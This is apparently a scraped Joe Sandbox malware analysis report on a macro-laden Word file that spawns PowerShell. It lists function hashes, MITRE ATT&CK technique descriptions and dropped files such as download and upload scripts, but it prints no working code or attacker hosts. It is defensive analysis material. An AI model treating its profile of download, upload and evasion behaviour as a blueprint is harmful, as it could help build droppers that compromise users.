Instruction Fuzzy Hash: A4D05E352000249FCB44AB68E518C657BEAEB4835171180A5EA09C7322CA35DC008BA1

Analysis Process: powershell.exePID: 8160, Parent PID: 7420COMMON

Executed Functions

Function 07A10BF8 Relevance: 9.1, Strings: 7, Instructions: 344COMMON

Download Yara Rule

Strings

$q, xrefs: 07A10CB6
$q, xrefs: 07A10D2C
$q, xrefs: 07A10D20
Ac], xrefs: 07A1102D
4'q, xrefs: 07A11043
4'q, xrefs: 07A10D59
4'q, xrefs: 07A10D4D

Memory Dump Source

Source File: 0000000F.00000002.2611188149.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7a10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$$q$$q$$q$Ac]
API String ID: 0-3393326812
Opcode ID: efa0ec98e9bbff89433b761715e5b6671d9c2059fa4bf5b69e488b16ac6d7edd
Instruction ID: 72ded3bedb85c9a7b2025c7f33d727e7427b0e65609ab8088026bcfc1d13ae4b
Opcode Fuzzy Hash: efa0ec98e9bbff89433b761715e5b6671d9c2059fa4bf5b69e488b16ac6d7edd
Instruction Fuzzy Hash: 7AB13CF170130A8FEB259B75D85076F7BF2AFC5211F14806AD855CB292DB35D881CBA2

Function 07A10BDD Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

$q, xrefs: 07A10CB6
$q, xrefs: 07A10D20
4'q, xrefs: 07A10D4D

Memory Dump Source

Source File: 0000000F.00000002.2611188149.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7a10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$$q$$q
API String ID: 0-3789935075
Opcode ID: 5680000189546b445168bea4e7800786235d6c94c44c492080f66b65204d1a04
Instruction ID: db3ee527540ed9d09574b1ec96b92004144ba4c1f335452b30630625856aa289
Opcode Fuzzy Hash: 5680000189546b445168bea4e7800786235d6c94c44c492080f66b65204d1a04
Instruction Fuzzy Hash: B731C0F0602306DFFF249F25C5107AB7BA5AFC2255F184066D8649B292EB35E9C1CF62

Function 04FE72E0 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2599863808.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1a4b3570b2c5f5c3525358054f4f8934966331a9d777091b26963867663be58
Instruction ID: f3c78e67e3a6f2a6e6dfdabe0ced6c9fc8706f06dfe726444f95d966ca8bfc06
Opcode Fuzzy Hash: f1a4b3570b2c5f5c3525358054f4f8934966331a9d777091b26963867663be58
Instruction Fuzzy Hash: CF328E34E053489FCB15DF69D890AADBBF2AF49310F19809AE444AB362C735ED46CB91

Function 04FE29F0 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2599863808.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b0e7f77556348f4eb04e57dae8e5cc13bc2761723655539d26b02abbdbd360
Instruction ID: 9958a05518d4e5396363e9cf445faeedaae416dc0b407f02c23f6d2c13aed8e4
Opcode Fuzzy Hash: e5b0e7f77556348f4eb04e57dae8e5cc13bc2761723655539d26b02abbdbd360
Instruction Fuzzy Hash: CEA1B374A006098FCB15CF59C4849BEFBB6FF88320B2586A9D4159B365D735FC42CBA0

Function 04FE2B00 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2599863808.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6e6e0a5f5e415ff5878ac7dfcd4562bc925f0133e0b10994972d5743201b8b6
Instruction ID: d8562a42374950d48b131ade3f08e60c25cb9cc1319932ff41cb22feaefabb1e
Opcode Fuzzy Hash: d6e6e0a5f5e415ff5878ac7dfcd4562bc925f0133e0b10994972d5743201b8b6
Instruction Fuzzy Hash: D8418C74A006098FCB05CF59C498AFAF7B5FF48320B158699D815AB361C736FC92CBA0

Function 031ED01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2598392493.00000000031ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 031ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_31ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40aaa00ac565e670bf22e06fe14b39cfbb4c58b16649adea64d0bfbb909cb190
Instruction ID: 7efcf27fa0632bdf9072cfd9997a34b64ff91a4c4efbc41365ec78427e46d329
Opcode Fuzzy Hash: 40aaa00ac565e670bf22e06fe14b39cfbb4c58b16649adea64d0bfbb909cb190
Instruction Fuzzy Hash: 4701F2314047409FE7209E21EDC4B67FB98DF49221F1CC05AEC480F282C77A9882CAB2

Function 031ED006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2598392493.00000000031ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 031ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_31ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6380d2c9c79d34e3f75974a072cf8229e9e2c4285848109cf40262589da1a563
Instruction ID: 72547dd1fe9a595e2b59fd32cbbf360ebe53dc4455d0a2c1f112ac58ed2bf7ef
Opcode Fuzzy Hash: 6380d2c9c79d34e3f75974a072cf8229e9e2c4285848109cf40262589da1a563
Instruction Fuzzy Hash: 8E011B7140A3C05FD7128B259994B52BFA89B47225F1D81CBD8888F2A3C2699848CB72

Non-executed Functions

Function 07A10361 Relevance: 5.0, Strings: 4, Instructions: 47COMMON

Download Yara Rule

Strings

4'q, xrefs: 07A103CB
4'q, xrefs: 07A103D7
$q, xrefs: 07A103B6
$q, xrefs: 07A103AA

Memory Dump Source

Source File: 0000000F.00000002.2611188149.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7a10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q
API String ID: 0-3199993180
Opcode ID: 21151c36b8e0e5cc431f2fa15c074cfbc839254436e7b42a36ab54ff9cc85c83
Instruction ID: 70266fdc45079e791d1ae5624d0ee18a9eda6d03d03bf64492e279c018cbf81b
Opcode Fuzzy Hash: 21151c36b8e0e5cc431f2fa15c074cfbc839254436e7b42a36ab54ff9cc85c83
Instruction Fuzzy Hash: 3B01F2B0B093968FE32B57285A206567FB66FC351072E4087C081CF293C9258C42C3A3

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report mal_temp.dotm.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20idcw3m.ibq.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bkawnr1s.2mu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1t2yshk.nal.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnpfzwmj.lnk.psm1

C:\Users\user\AppData\Local\Temp\downloaded_script.ps1

C:\Users\user\AppData\Local\Temp\upload_script.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HUP3T8IDFRWN6X9UZSKF.temp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

C:\Users\user\Desktop\mal_temp.dotm.doc (copy)

C:\Users\user\Desktop\~$l_temp.dotm.doc

C:\Users\user\Desktop\~WRD0000.tmp

C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

Static File Info

General

File Icon

Static OLE Info

General

OLE File "mal_temp.dotm.doc"

Windows Analysis Report
mal_temp.dotm.doc